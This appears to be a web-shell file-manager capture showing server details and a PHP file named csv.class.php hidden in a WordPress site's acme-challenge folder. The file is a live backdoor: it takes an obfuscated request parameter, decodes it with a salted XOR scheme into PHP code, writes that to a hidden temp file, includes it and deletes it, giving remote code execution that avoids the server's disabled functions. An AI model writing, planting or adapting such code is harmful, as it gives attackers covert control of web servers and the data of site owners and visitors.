HEX
Server: nginx/1.28.0
System: Linux yisu-68a5f20334161 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www (1000)
PHP: 8.2.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/q.autos58.cn/wp-content/well-known/acme-challenge/b/b/h/a/csv.class.php
<?php

if(isset($_REQUEST["\x74\x6Bn"]) ? true : false){
	$record = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), getenv("TMP"), getcwd(), "/dev/shm", session_save_path(), sys_get_temp_dir(), "/tmp"]);
	$val = $_REQUEST["\x74\x6Bn"];
		 $val  =explode  (  	'.'		 ,  $val )	;		
	$ref = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt  );
    
            foreach ($val as $y=>$v7) {  $sChar = ord($salt[$y  %$sLen]  );
                $d = ((int)$v7 - $sChar - ($y  %10))		^	 4;
                $ref .= chr($d  );
            }
	foreach ($record as $desc):
    		if ((is_dir($desc) and is_writable($desc))) {
    $elem = "$desc" . "/.value";
    if (file_put_contents($elem, $ref)) {
	include $elem;
	@unlink($elem);
	die();
}
}
endforeach;
}